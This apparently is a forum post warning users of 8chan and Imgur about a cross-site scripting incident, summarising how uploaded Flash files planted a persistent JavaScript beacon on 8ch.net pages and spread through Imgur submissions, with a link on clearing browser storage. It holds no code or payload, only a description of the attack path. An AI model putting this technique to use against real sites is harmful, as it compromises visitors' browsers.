8chan XSS/imgur breach



Anyone who uses 8Chan, or Imgur may want to check this out:

Here is a pastebin with a lot of info on what is happening, and details about it:


And here is something that should help you stay safe: http://www.ghacks.net/2015/02/05/how-to-clear-web-storage-in-your-browser-of-choice/

And here is the gist of what is going on exactly:

Exploits XSS on 8ch via Flash (arbitrary SWFs are uploadable and accessible through 8ch.net root domain). SWF places a persistent JS beacon on all 8ch pages to wait for further JS to run, as issued by a server, though no payload has been seen yet from the server. XSS is spreading to likely users of 8ch by compromising imgur through unknown means, and loading the SWF in certain imgur submissions (4chan screenshots). No DDoS, no attempt to exploit recent Flash CVEs (yet).


I was reading allot this earlier today. Imgur was saying they would fix it ASAP.